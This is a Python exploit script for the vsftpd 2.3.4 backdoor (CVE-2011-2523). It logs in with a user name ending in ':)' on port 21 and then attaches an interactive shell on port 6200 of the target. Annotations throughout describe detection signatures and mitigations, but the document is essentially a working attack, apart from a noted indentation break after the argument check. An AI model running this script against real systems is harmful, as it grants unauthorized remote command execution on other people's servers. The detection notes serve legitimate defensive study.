#!/usr/bin/python3
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
from telnetlib import Telnet
import argparse
import sys
import time
# Flat script: parse one target address, send a fixed USER/PASS pair to the FTP
# service on port 21, then attach the terminal to TCP port 6200 on the same host.
# The steps match the vsftpd 2.3.4 backdoor named in the file header (CVE-2011-2523).
parser = argparse.ArgumentParser(description='vsftpd 2.3.4 exploit', usage=f'python3 {sys.argv[0]} -host ip_address', epilog=f'EXAMPLE - python3 %(prog)s -host 192.168.168.128')
parser.add_argument('-host',metavar="ip address", dest='host',help="input the ip address of the vulnerable host", required=True)
# -host is declared required=True, so parse_args() itself reports an error and
# exits when the option is missing; the argv-length check below runs after that.
args = parser.parse_args()
host = args.host
# NOTE(review): the two statements after this `if` appear to have lost their
# indentation in this copy of the file; they read as the body of the check.
if len(sys.argv) < 3:
parser.print_help()
sys.exit()
# Fixed values used on the FTP control connection.
# Detection: the USER argument ends in ":)". An FTP login whose user name
# contains that two-character sequence is the network and log signature to
# alert on for this CVE; it is visible in clear text on port 21.
portFTP = "21"
user = "USER hackerman:)"
password = "PASS pass"
print("If it take so long to connect to host then check host is running vsftpd or not!")
time.sleep(2)
# No timeout is passed to Telnet(), so the connect and the read_until() calls
# below block until the peer answers or the OS gives up.
tn = Telnet(host,portFTP)
print(f"[+]Opening Connection to {host} on port 21: Done")
time.sleep(1)
# Wait for the exact greeting text "(vsFTPd 2.3.4)". A server announcing any
# other banner never satisfies this read. The same banner string is what an
# asset inventory can match to find installs that need replacing.
tn.read_until(b"(vsFTPd 2.3.4)")
tn.write(user.encode('ascii') + b"\n")
# Presumably the tail of the server's reply to USER asking for a password.
tn.read_until(b"password.")
tn.write(password.encode('ascii') + b"\n")
tn.close()
time.sleep(5)
# Second connection goes to TCP 6200 on the same host.
# Detection and mitigation: an FTP server that listens on, or accepts inbound
# connections to, port 6200 shortly after a ":)" login is an indicator of
# compromise. Filter that port at the host or network firewall, and replace a
# 2.3.4 install with a current vsftpd build whose source or package signature
# has been verified.
# Note the message below is printed before the connection is attempted.
print(f"[+]Opening Connection to {host} on port 6200: Done")
tn2 = Telnet(host, 6200)
# Printed as soon as the TCP connect returns; nothing here checks what is
# actually listening on the port.
print("[+]Success, shell opened")
print("[*]Send `exit` to quit shell")
# interact() relays the local terminal's input and output over the socket
# until the session ends.
tn2.interact()